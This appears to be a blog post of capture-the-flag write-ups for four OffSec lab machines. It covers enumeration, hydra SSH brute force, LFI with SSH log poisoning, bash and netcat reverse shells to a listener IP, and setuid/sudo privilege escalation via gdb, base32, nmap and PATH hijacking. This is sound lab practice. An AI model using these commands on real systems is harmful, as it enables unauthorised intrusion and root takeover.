Post

OffSec PG - Gaara, Geisha, Ha-Natraj, Inclusiveness

OffSec PG - Gaara, Geisha, Ha-Natraj, Inclusiveness

Gaara

Enumeration

Machine IP → 192.168.208.142

Network Scan

Nmap scan → nmap -sC -sV -Pn -p- -A -o nmap.txt 192.168.208.142

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
22SSHOpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80HTTPApache httpd 2.4.38 ((Debian))

Web Scan

GoBuster scan → gobuster dir -u http://192.168.208.142 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php

This did not reveal any useful information.

Exploitation

Using the image on the webpage as a reference, the username could be gaara. Therefore, used hydra to brute force the ssh server against the rockyou password list.

hydra -l gaara -P /usr/share/wordlists/rockyou.txt ssh://192.168.208.142:22

This gives the password as iloveyou2 and subsequently gets the user flag.

Privilege Escalation

Checking for setuid binaries reveals the presence of gdb as a setuid to root executable. The user is not present in the sudoers file. Therefore, it is essential to escalate using the gdb binary.

This is done as follows → gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit.

This grants the root shell and subsequently the root flag.


Geisha

Enumeration

Machine IP → 192.168.56.82

Network Scan

Nmap scan → nmap -sC -A -Pn -p- -o nmap.txt 192.168.56.82

OS Detection → OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
21FTPvsftpd 3.0.3
22SSHOpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80HTTPApache httpd 2.4.38 ((Debian))
7080HTTPSssl/empowerid LiteSpeed
7125HTTPnginx 1.17.10
8088HTTPLiteSpeed httpd
9198HTTPSimpleHTTPServer 0.6 (Python 2.7.16)

Web Scan

GoBuster scan → gobuster dir -u http://192.168.56.82:<ports> -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php

Directories/files listed →

Port 8088 →

  • cgi-bin/ (404)
  • docs/
  • blocked/ (403)

Port 7125 →

  • shadow (403)
  • passwd

The passwd file lists user geisha.

Exploitation

With the username as geisha, a brute force was launched on the ssh server using hydra as follows → hydra -l geisha -P /home/tanq/installations/SecLists/rockyou.txt ssh://192.168.56.82.

This gives the password as letmein. After a successful login, the user flag can be obtained.

Privilege Escalation

Using the user shell, enumerated for setuid binaries as follows → find / -perm -u=s 2>/dev/null.

This resulted in an interesting find for the binary /usr/bin/base32. This could be used to read files with a privileged access, thereby allowing reads of files owned by root. Therefore, it was used to read the root flag as follows →

1
2
file=/root/proof.txt
/usr/bin/base32 "$file" | /usr/bin/base32 --decode

This can also be used to obtain root shell by using it to leak the ssh key of root and then using it to log in to the machine via ssh.

This gave the root flag.


Ha-Natraj

Enumeration

Machine IP → 192.168.51.80

Network Scan

Nmap scan → nmap -sC -sV -Pn -p- -A -o nmap.txt 192.168.51.80

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

Table

PortServiceOther details (if any)
22SSHOpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80HTTPApache httpd 2.4.29 (Ubuntu)

Web Scan

GoBuster scan → gobuster dir -u http://192.168.51.80 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php

Directories/files listed →

  • images/
  • index.html
  • console/

The console/ directory has a php file present in it called file.php.

Exploitation

LFI

Running the file.php file does not give any output. As a good practice checking for LFI using ?file=../../../../../etc/passwd works out and LFI is possible. There is an ssh service on the machine, therefore, checked log files. The auth log file at /var/log/auth.log contains the ssh logs.

Transition LFI to SSH Log Poisoning

Given the presence of SSH logs, poisoning is tested by using payload → ssh "<?php system(\$_GET['cmd']);?>"@<192.168.125.80>. A failed login attempt gets logged and the php code is inserted. LFI can now be used to execute the php in the log file, with the addition of the cmd parameter like so → ..console/file.php?file=/var/log/auth.log&cmd=id. This returned the id of the www-data user in the response i.e., RCE.

User shell

Using the RCE, a shell can be spawned by using bash payload → bash -i >& /dev/tcp/192.168.49.208/3002 0>&1 to get a reverse shell. This can be done via burp to URL encode and send the payload. There was no bash in the system, therefore reverting to nc and /bin/sh combo → rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.208 3002 >/tmp/f.

This gives a www-data user shell via netcat.

Privilege Escalation

Escalated User

With the www-data shell, the linenum script can be run (example → linenum script). This gives the files which are writable by the current user. One such file is the apache2.conf file which can be modified to ensure execution of the web server as a privileged user by editing the User and Group to be mahakal, a user detected by looking at the /etc/passwd file.

Next, a pentest monkey php reverse shell is plugged into the serving directory for navigation to it. This can be named exploit.php. The server needs to be restarted for the new settings to be applied. Therefore, as revealed using sudo -l, the server can be restarted as super user without the need of a password using the systemctl command as the www-data user.

After it is restarted, a listener can be used to receive shell as the user mahakal.

Root

As the user mahakal, the binary that can be run as as a super user without a password as revealed by sudo -l is actually nmap.

Nmap can be used to launch an interactive interpreter using →

1
2
3
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF

Thus, the shell received is actually that of root. This gives the root flag.


Inclusiveness

Enumeration

Machine IP → 192.168.80.14

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.80.14

OS Detection → OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
21FTPvsftpd 3.0.3 → Anonymous FTP allowed
22SSHOpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80HTTPApache httpd 2.4.38 ((Debian))

Web Scan

GoBuster scan → gobuster dir -u http://192.168.80.14 -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed →

  • index.html
  • robots.txt
  • seo.html
  • javascript/
  • manual/

Looking at the robots.txt, it says only search engines are allowed to access it. Therefore, changing the User-Agent to GoogleBot in burp allows bypassing this restriction. This gives the directory /secret_information/.

Exploitation

LFI

The /secret_information/ directory consists of an introduction to DNS Zone transfer attacks and links to display it in English or Spanish. The links are of the form ..?lang=language.php. Therefore, attempting LFI here allows to print contents of the /etc/passwd file. This gives enumeration of the users → tom and root.

The anonymous ftp login shows that the pub directory of the FTP service is world writeable. Therefore, it is a good place for landing payloads. To get the exact path of the location, the configuration file must be read. From the service enumeration, the version is known to be vsftpd 3.0.3. The default config for this is at /etc/vsftpd.conf.

Using LFI to print this shows the following →

1
2
anon_root=/var/ftp/
write_enable=YES

Reverse shell from Anonymous write-enabled FTP and LFI

Using the FTP to upload a reverse shell in PHP and then using LFI to navigate to the payload using the path found in the config file grants the shell as user www-data. The payload used is pentest monkey’s PHP reverse shell.

Enumerating the setuid binaries, an interesting find was the presence of /home/tom/rootshell, which indicates getting privilege of user tom is the step required to get root on the machine.

Privilege Escalation

User

The home directory of the user tom is readable by www-data. Therefore, visiting it grants access to the code of the rootshell binary found above. This also gives the user flag.

The code of the rootshell binary uses FILE* f = popen("whoami", "r");. This does not use an exact path, therefore, the PATH variable can be abused to trick the program into evaluating the username as tom. Therefore, creating a new directory in /tmp and an executable whoami under it that prints tom allows adding this to the current PATH.

1
2
3
4
echo '#!/bin/bash' > whoami
echo 'echo tom' >> whoami
chmod +x whoami
export PATH=/tmp/testdirectory

This allows for execution of the rootshell binary, which evaluates all checks to true and grants the root shell, thereby the root flag.


This post is licensed under CC BY 4.0 by the author.